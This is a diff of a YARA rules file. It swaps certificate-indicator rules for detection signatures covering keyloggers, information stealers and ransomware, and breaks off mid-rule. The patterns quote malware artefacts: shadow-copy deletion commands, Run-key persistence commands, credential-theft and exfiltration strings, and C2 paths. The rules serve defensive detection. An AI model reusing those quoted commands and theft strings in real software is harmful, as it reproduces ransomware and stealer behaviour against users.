-		thumbprint = "bddcef09f222ea4270d4a1811c10f4fcf98e4125"
-		importance = 20
+
+	strings:
+		$s1 = "Go build ID: \"" ascii
+		$s2 = "file_upload.go" ascii
+		$s3 = "grequests.FileUpload" ascii
+		$s4 = "runtime.newproc" ascii
+		$s5 = "credit_cards" ascii
+		$s6 = "zip.(*fileWriter).Write" ascii
+		$s7 = "autofill_" ascii
+		$s8 = "XFxVc2VyIERhdGFcXA==" ascii
+		$s9 = "XFxBcHBEYXRhXFxMb2NhbFxc" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APDZQKILIIQVIJSCTY" and pe.signatures [ i ] . serial == "c6:d7:ad:85:2a:f2:11:bf:48:f1:9c:c0:24:2d:cd:72" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0084888D5A12228E8950683Ecdab62Fe7A : FILE
+rule DITEKSHEN_MALWARE_Win_M00Nd3V : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "M00nD3v keylogger payload"
 		author = "ditekSHen"
-		id = "5036d604-55df-565a-b6db-c788da007ea8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4000f55d-e072-50b6-b6ee-72cefc0ec53f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4309-L4320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L694-L715"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4deda791923cdacccf57d54651ca44bd8c04d053a11ccf5700354f9f37be17de"
+		logic_hash = "68a0888da3b114dc895fe18a3d03b2b88d140fbf82b888f7a031b9364d01aabf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "390b23ed9750745e8441e35366b294a2a5c66fcd"
-		importance = 20
+
+	strings:
+		$s1 = "M00nD3v Stub" ascii wide
+		$s2 = "M00nD3v{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" fullword wide
+		$s3 = "Anti-Keylogger Elite" wide
+		$s4 = "/C TASKKILL /F /IM" wide
+		$s5 = "echo.>{0}:Zone.Identifier" fullword wide
+		$s6 = "> Nul & Del \"{0}\" & start \"\" \"{1}.exe\"" wide
+		$s7 = "> Nul & start \"\" \"{1}.exe\"" wide
+		$s8 = "Stealer" fullword wide
+		$s9 = "{0}{0}++++++++++++{1} {2}++++++++++++{0}{0}" wide
+		$s10 = "{4}Application: {3}{4}URL: {0}{4}Username: {1}{4}Password: {2}{4}" wide
+		$s11 = "encrypted_key\":\"(?<Key>.+?)\"" wide
+		$s12 = "Botkiller" fullword ascii
+		$s13 = "AVKiller" fullword ascii
+		$s14 = "get_pnlPawns" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ub30 Limited" and pe.signatures [ i ] . serial == "00:84:88:8d:5a:12:22:8e:89:50:68:3e:cd:ab:62:fe:7a" )
+		( uint16( 0 ) == 0x5a4d and 6 of them ) or ( 9 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_709D547A2F09D39C4C2334983F2Cbf50 : FILE
+rule DITEKSHEN_MALWARE_Win_Vssdestroy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "VSSDestroy/Matrix ransomware payload"
 		author = "ditekSHen"
-		id = "e3b2ab8b-be90-5593-843f-59f2d626e604"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "734ece56-b993-5b44-ae15-f673fabfe8ad"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4322-L4333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L717-L740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f45a2047181f3f07a8fb9cc00aafc31ba7aa369fc5c0165557757306a0de0d44"
+		logic_hash = "24bfd32580f784440252d629a7ab86b84a570ded34409940616be2a89bf73088"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f10095c5e36e6bce0759f52dd11137756adc3b53"
-		importance = 20
+		snort_sid = "920008-920009"
+		clamav_sig = "MALWARE.Win.Ransomware.VSSDestroy"
+
+	strings:
+		$o1 = "[SHARESSCAN]" wide
+		$o2 = "[LDRIVESSCAN]" wide
+		$o3 = "[LOGSAVED]" wide
+		$o4 = "[LPROGRESS]" wide
+		$o5 = "[FINISHSAVED]" wide
+		$o6 = "[ALL_LOCAL_KID]" wide
+		$o7 = "[DIRSCAN" wide
+		$o8 = "[GENKEY]" wide
+		$s1 = "\\cmd.exe" nocase wide
+		$s2 = "/C powershell \"" nocase wide
+		$s3 = "%COMPUTERNAME%" wide
+		$s4 = "%USERNAME%" wide
+		$s5 = "Error loading Socket interface (ws2_32.dll)!" wide
+		$s6 = "Old file list dump found. Want to load it? (y/n):" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BMUZVYUGWSQWLAIISX" and pe.signatures [ i ] . serial == "70:9d:54:7a:2f:09:d3:9c:4c:23:34:98:3f:2c:bf:50" )
+		( uint16( 0 ) == 0x5a4d and 4 of ( $o* ) and 3 of ( $s* ) ) or ( 5 of ( $o* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_98A04Ea05E8A949A4D880D0136794Df3 : FILE
+rule DITEKSHEN_MALWARE_Win_Goldenaxe : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "GoldenAxe ransomware payload"
 		author = "ditekSHen"
-		id = "cda10dcf-bc46-56d9-a4b5-60a76249334c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "23874106-dbbb-5cb2-b61a-1661d8e2d868"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4335-L4346"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L742-L763"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05c63386558b954da3cfec1fd514a7a567189d9ac33d818cbbabf3eaf72ed130"
+		logic_hash = "6dfd88ce65acdfed4749e3b817b317c3c514ea42f892a7f5f95853c148507918"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0387ce856978cfa3e161fc03751820f003b478f3"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.GoldenAxe"
+
+	strings:
+		$s1 = "Go build ID: " ascii
+		$s2 = "taskkill.exe" ascii
+		$s3 = "cmd.exe" ascii
+		$s4 = "Speak.Speak" ascii
+		$s5 = "CLNTSRVRnull" ascii
+		$s6 = "-----END" ascii
+		$s7 = "-----BEGIN" ascii
+		$s8 = ".EncryptFile" ascii
+		$g1 = "GoldenAxe/Utils." ascii
+		$g2 = "GoldenAxe/Cryptography." ascii
+		$g3 = "GoldenAxe/Walker." ascii
+		$g4 = "C:/Users/alpha/go/src/GoldenAxe/" ascii
+		$g5 = "'Golden Axe ransomware'" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRVFMPRLNIMAMSUIMT" and pe.signatures [ i ] . serial == "98:a0:4e:a0:5e:8a:94:9a:4d:88:0d:01:36:79:4d:f3" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $g* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2355895F1759E9E3648026F4 : FILE
+rule DITEKSHEN_MALWARE_Win_Robbinhood : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Robbinhood ransomware payload"
 		author = "ditekSHen"
-		id = "d716ed7f-8886-587d-a868-805da13bb925"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a5066a22-3c87-5e9f-a94f-5a44af2f96fd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4348-L4360"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L765-L787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "429375af70872755ab2d517b125042795c9a20238405a4af5b0caecc46a3f563"
+		logic_hash = "f1c4226ed5cb1583418d5ef0efc2c2b5bc3cfe7f148f359c5d432fd660331a46"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "f46d457898d436769f0c70127044e2019583ee16"
-		hash1 = "f4f4a5953d0c87db611fa05bb51672591295049978a0e9e14eca8224254ecd7a"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Robbinhood"
+
+	strings:
+		$go = "Go build ID:" ascii
+		$cmd1 = "cmd.exe /c" ascii
+		$cmd2 = "net use * /DELETE" nocase ascii
+		$cmd3 = "sc.exe stop" ascii
+		$cmd4 = "vssadmin resize shadowstorage" nocase ascii
+		$s1 = /Skipping\s(file|dir)/ ascii
+		$s2 = "Encrypt[ERR] GET Size:" ascii
+		$s3 = ".taskkilltasklistunknown(" ascii
+		$s4 = ".sysvssadmin.exewevtutil.exe MB released" ascii
+		$s5 = ".sysvssadmin.exewevtutil.exewinlogin.exewinlogon.exe MB released" ascii
+		$s6 = ".enc_robbinhood" ascii
+		$s7 = "c:\\windows\\temp\\pub.key" nocase ascii
+		$s8 = "main.CoolMaker" ascii
+		$s9 = "/valery/go/src/oldboy/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "23:55:89:5f:17:59:e9:e3:64:80:26:f4" )
+		uint16( 0 ) == 0x5a4d and ( $go and 1 of ( $cmd* ) and 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00818631110B5D14331Dac7E6Ad998B902 : FILE
+rule DITEKSHEN_MALWARE_Win_Getcrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "GetCrypt ransomware payload"
 		author = "ditekSHen"
-		id = "15efa9cf-5457-5b04-abee-8f86721c5d56"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "fb6db807-372f-59e6-96c6-54dd4ece336d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4376-L4390"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L789-L825"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee82090ceb1378b44c283586d0f0b6ec0d9779fab2497b0168acec8e5546a4a8"
+		logic_hash = "fd7ee98757c3ac1f2b2a4dd9041c78d33273d7a7d596c3d99c6b8d79988f29f1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "c93082334ef8c2d6a0a1823cdf632c0d75d56377"
-		importance = 20
+		clamav_sig1 = "MALWARE_Win.Ransomware.GetCrypt-1"
+		clamav_sig2 = "MALWARE_Win.Ransomware.GetCrypt-2"
+
+	strings:
+		$x1 = "delete shadows /all /quiet" wide
+		$x2 = "C:\\Windows\\System32\\svchost.exe" fullword wide
+		$x3 = "desk.bmp" fullword wide
+		$x4 = ":\\Boot" fullword wide
+		$x5 = "\\encrypted_key.bin" fullword wide
+		$x6 = "vssadmin.exe" fullword wide
+		$x7 = ":\\Recovery" fullword wide
+		$s1 = "CryptEncrypt" fullword ascii
+		$s2 = "NtWow64ReadVirtualMemory64" fullword ascii
+		$s3 = "MPR.dll" fullword ascii
+		$s4 = "%key%" fullword ascii
+		$s5 = "CryptDestroyKey" fullword ascii
+		$s6 = "ntdll.dll" fullword ascii
+		$s7 = "WNetCancelConnection2W" fullword ascii
+		$s8 = ".%c%c%c%c" fullword wide
+		$s10 = { 43 72 79 70 74 49 6d 70 6f 72 74 4b 65 79 00 00
+                 cb 00 43 72 79 70 74 45 6e 63 72 79 70 74 00 00
+                 c1 00 43 72 79 70 74 41 63 71 75 69 72 65 43 6f
+                 6e 74 65 78 74 41 00 00 c8 00 43 72 79 70 74 44
+                 65 73 74 72 6f 79 4b 65 79 00 d2 00 43 72 79 70
+                 74 47 65 6e 52 61 6e 64 6f 6d 00 00 c2 00 43 72
+                 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78
+                 74 57 00 00 41 44 56 41 50 49 33 32 2e 64 6c 6c
+                 00 00 b5 01 53 68 65 6c 6c 45 78 65 63 75 74 65
+                 45 78 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 8 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7Ab21306B11Ff280A93Fc445876988Ab : FILE
+rule DITEKSHEN_MALWARE_Joego : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "JoeGo ransomware payload"
 		author = "ditekSHen"
-		id = "583fccef-3ad5-5f9a-a030-d6bf9ebed00f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "23d38bcd-e66d-5ff1-ad6a-3e6432d83562"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4392-L4403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L827-L847"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aa93d36d472d24cdd937c323ffa048fc71984fcf8a13400618ec8a0f2c172fc0"
+		logic_hash = "3ddf3506aefb3cd1845f9daa689848a02a2422ca98c5c984bc918cc7ea2b2677"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6d0d10933b355ee2d8701510f22aff4a06adbe5b"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.JoeGo"
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "%SystemRoot%\\system32\\%v." ascii
+		$s2 = "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V" ascii
+		$s3 = "/t REG_SZ /F /D %userprofile%\\" ascii
+		$s4 = "(sensitive) [recovered]" ascii
+		$s5 = "/dev/stderr/dev/stdout/index.html" ascii
+		$s6 = "%userprofile%\\SystemApps" ascii
+		$s7 = "p=<br>ACDTACSTAEDTAESTAKDTAKSTAWSTA" ascii
+		$cnc1 = "/detail.php" ascii
+		$cnc2 = "/checkin.php" ascii
+		$cnc3 = "/platebni_brana.php" ascii
+		$cnc4 = "://nebezpecnyweb.eu/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" )
+		uint16( 0 ) == 0x5a4d and $go and ( all of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $cnc* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0086909B91F07F9316984D888D1E28Ab76 : FILE
+rule DITEKSHEN_MALWARE_Win_Aurora : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Aurora ransomware payload"
 		author = "ditekSHen"
-		id = "58b191cc-82f2-5ad3-8d1e-91c7528880c6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d3eafe9c-c8d9-5744-ba5d-4eb0249cceea"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4405-L4416"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L849-L869"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eb8807437edbbba52a928de4ebf0a25513127bd9800088e0d85e41c8375a05b1"
+		logic_hash = "056bb11e8b947ef90462503db82b2001e4a5d4847fad9c0d5d771384a80d779a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5eba3c38e989c7d16c987e2989688d3bd24032bc"
-		importance = 20
+
+	strings:
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii wide
+		$s2 = "#DECRYPT_MY_FILES#.txt" fullword ascii
+		$s3 = "/gen.php?generate=" fullword ascii
+		$s4 = "geoplugin.net/php.gp" ascii
+		$s5 = "/end.php?id=" fullword ascii
+		$s6 = "wotreplay" fullword ascii
+		$s7 = "moneywell" fullword ascii
+		$s8 = "{btc}" fullword ascii
+		$s9 = ".?AV_Locimp@locale@std@@" ascii
+		$s10 = ".?AV?$codecvt@DDU_Mbstatet@@@std@@" ascii
+		$s11 = ".?AU_Crt_new_delete@std@@" ascii
+		$pdb1 = "\\z0ddak\\Desktop\\source\\Release\\Ransom.pdb" ascii
+		$pdb2 = "\\Desktop\\source\\Release\\Ransom.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 5 of ( $s* ) ) or ( 8 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : FILE
+rule DITEKSHEN_MALWARE_Win_Buran : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Buran ransomware payload"
 		author = "ditekSHen"
-		id = "d96df78b-3824-5f94-8a32-87dfd9cd585f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1433bac5-2ece-54bb-8e57-b5834fffc719"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4418-L4429"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L871-L903"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "845abc1f08a4d56b32477fbe8855f45633833c68f4255d0690f10cc23c167e84"
+		logic_hash = "eaf50d824dbade0ca63fafc5b4a376553039de9b51a0f6387cb28c8f91a7e0b9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "10d82c75a1846ebfb2a0d1abe9c01622bdfabf0a"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Buran"
+
+	strings:
+		$v1_1 = "U?$error_info_injector@V" ascii
+		$v1_2 = "Browse for Folder (FTP)" fullword ascii
+		$v1_3 = "Find/Replace in Files" fullword ascii
+		$v1_4 = "PAHKLM" fullword ascii
+		$v1_5 = "PAHKCR" fullword ascii
+		$v1_6 = "chkOpt_" ascii
+		$h1 = "Search <a href=\"location\" class=\"menu\">in this folder</a>" ascii
+		$h2 = "<br>to find where the text below" ascii
+		$h3 = "</a> files with these extensions (separate with semi-colons)" ascii
+		$h4 = "Need help with <a href=\"" ascii
+		$path = "\\work\\cr\\nata\\libs\\boost_" wide
+		$v2_1 = "(ShlObj" fullword ascii
+		$v2_2 = "\\StreamUnit" fullword ascii
+		$v2_3 = "TReadme" fullword ascii
+		$v2_4 = "TDrivesAndShares" fullword ascii
+		$v2_5 = "TCustomMemoryStreamD" fullword ascii
+		$v2_6 = "OpenProcessToken" fullword ascii
+		$v2_7 = "UrlMon" fullword ascii
+		$v2_8 = "HttpSendRequestA" fullword ascii
+		$v2_9 = "InternetConnectA" fullword ascii
+		$v2_10 = "FindFiles" fullword ascii
+		$v2_12 = "$*@@@*$@@@$" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" )
+		uint16( 0 ) == 0x5a4d and ( ( ( all of ( $v1* ) and 1 of ( $h* ) ) or ( $path and 2 of ( $v1* ) and 1 of ( $h* ) ) or 10 of them ) or all of ( $v2* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_13039Da3B2924B7A8B0A2Ac4637C2Efa : FILE
+rule DITEKSHEN_MALWARE_Win_Masslogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "MassLogger keylogger payload"
 		author = "ditekSHen"
-		id = "9621584b-a115-5b96-8de5-15776232cdb2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9181b89a-2ce8-59b6-9703-c01a8471b8d6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4431-L4442"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L905-L934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7492f2a50effae809b512ce7a2a769f3db62ab3573974206b729417cc629ca83"
+		logic_hash = "7d8bbefa71a1eb20cd9d029bd516d6c37e39cfa053ed0617eace200d210d9b58"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ad9fa264674c152b2298533e41e098bcaa0345af"
-		importance = 20
+
+	strings:
+		$s1 = "MassLogger v" ascii wide
+		$s2 = "MassLogger Started:" ascii wide
+		$s3 = "MassLogger Process:" ascii wide
+		$s4 = "/panel/upload.php" wide
+		$s5 = "ftp://" wide
+		$s6 = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" fullword wide
+		$s7 = "^(.*/)?([^/\\\\.]+/\\\\.\\\\./)(.+)$" fullword wide
+		$s8 = "Bot Killer" ascii
+		$s9 = "Keylogger And Clipboard" ascii
+		$c1 = "costura.ionic.zip.reduced.dll.compressed" fullword ascii
+		$c2 = "CHECKvUNIQUEq" fullword ascii
+		$c3 = "HOOK/MEMORY6" fullword ascii
+		$c4 = "Massfile" ascii wide
+		$c5 = "Fz=[0-9]*'skips*" fullword ascii
+		$c6 = ":=65535zO" fullword ascii
+		$c7 = "!$!%!&!'!(!)!*!.!/!0!4!" fullword ascii
+		$c8 = "5!9!:!<!>!@!E!G!J!K!L!N!O!P!`!" fullword ascii
+		$c9 = "dllToLoad" fullword ascii
+		$c10 = "set_CreateNoWindow" fullword ascii
+		$c11 = "FtpWebRequest" fullword ascii
+		$c12 = "encryptedUsername" fullword ascii
+		$c13 = "encryptedPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tekhnokom" and pe.signatures [ i ] . serial == "13:03:9d:a3:b2:92:4b:7a:8b:0a:2a:c4:63:7c:2e:fa" )
+		( uint16( 0 ) == 0x5a4d and 9 of ( $c* ) ) or ( 5 of ( $s* ) or 9 of ( $c* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : FILE
+rule DITEKSHEN_MALWARE_Win_Echelon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Echelon information stealer payload"
 		author = "ditekSHen"
-		id = "5e17d055-26d7-5dde-a905-9d03fb164fa2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e13d2003-c755-5dd3-bb16-8e41dd19a151"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4444-L4455"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L936-L957"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5f0f5dac599923f385fcd8e8b14349263cabe1c83242fe097d9fb26ea0567c1a"
+		logic_hash = "c070bf52cc51dd334ea24614e33eaa2b7b1a17e7790e586cbbb8c7e33ba1bd76"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "db3d9ccf11d8b0d4f33cf4dc93689fdd942f8fbe"
-		importance = 20
+
+	strings:
+		$s1 = "<GetStealer>b__" ascii
+		$s2 = "clearMac" fullword ascii
+		$s3 = "path2save" fullword ascii
+		$s4 = "Echelon_Size" fullword ascii
+		$s5 = "Echelon Stealer by" wide
+		$s6 = "get__masterPassword" fullword ascii
+		$s7 = "DomainDetect" fullword ascii
+		$s8 = "[^\\u0020-\\u007F]" fullword wide
+		$s9 = "/sendDocument?chat_id=" wide
+		$s10 = "//setting[@name='Password']/value" wide
+		$s11 = "Passwords_Mozilla.txt" fullword wide
+		$s12 = "Passwords_Edge.txt" fullword wide
+		$s13 = "@madcod" ascii wide
+		$pdb = "\\Echelon-Stealer-master\\obj\\Release\\Echelon.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" )
+		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or $pdb ) ) or ( 8 of ( $s* ) or $pdb )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_08622B9Dd9D78E67678Ecc21E026522E : FILE
+rule DITEKSHEN_MALWARE_Win_Qulab
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Qulab information stealer payload or artifacts"
 		author = "ditekSHen"
-		id = "922282e9-9f34-537b-9fd1-283ae44b9b54"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6ae24c67-5700-5330-a3bd-d542162faebb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4457-L4468"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L959-L983"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e572c4241d92ad34efd91c3f6338da4093c83d84a734766448ac7cb2a72bc0c"
+		logic_hash = "659d828cbef38c6362b612be9bdc05ae820f49c23684e77af6462ea677133284"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "a7d86073742ea55af134e07a00aefa355dc123be"
-		importance = 20
+		tags = ""
